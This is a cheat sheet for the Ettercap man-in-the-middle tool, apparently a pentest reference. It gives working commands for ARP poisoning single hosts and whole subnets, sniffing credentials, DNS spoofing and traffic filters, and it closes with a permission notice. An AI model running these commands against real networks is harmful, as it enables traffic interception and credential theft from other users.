Ettercap Cheat Sheet
Ettercap is a classic man-in-the-middle (MITM) attack tool used for packet sniffing, traffic manipulation, credential harvesting, and protocol analysis on LAN networks.
Start Ettercap
Text Mode
ettercap -T
Graphical Mode
ettercap -G
List Network Interfaces
ettercap -I
Basic MITM (ARP Poisoning)
ettercap -T -q -i eth0 -M arp:remote /192.168.1.10/ /192.168.1.1/
-T→ text mode-q→ quiet-M arp:remote→ ARP poisoning
MITM Entire Subnet
ettercap -T -q -i eth0 -M arp:remote /192.168.1.0/24/ /192.168.1.1/
Sniff Credentials
ettercap -T -i eth0
Automatically parses many protocols: - HTTP - FTP - Telnet - POP3
Use Plugins
List plugins:
ettercap -P
Run plugin:
ettercap -T -P dns_spoof -i eth0
DNS Spoofing
ettercap -T -q -i eth0 -P dns_spoof
Edit hosts file:
/ettercap/etter.dns
Filters
Compile filter:
etterfilter filter.ecf -o filter.ef
Run filter:
ettercap -T -q -F filter.ef -i eth0
Typical Workflow
ettercap -T -i eth0
Select sniffing → Unified sniffing
Enable ARP poisoning
Activate plugins
Stop Attack
Press:
q
Restore network:
service network-manager restart
Common Issues
No traffic captured
- IP forwarding disabled
- Wrong interface selected
Targets lose connectivity
- ARP poisoning misconfigured
Related Tools
bettercapdsniffwiresharktcpdump
Use Cases
- MITM attacks
- Credential harvesting
- Network traffic analysis
- Red team operations
Legal Notice
Danger
Use Ettercap only on networks you own or have explicit permission to test.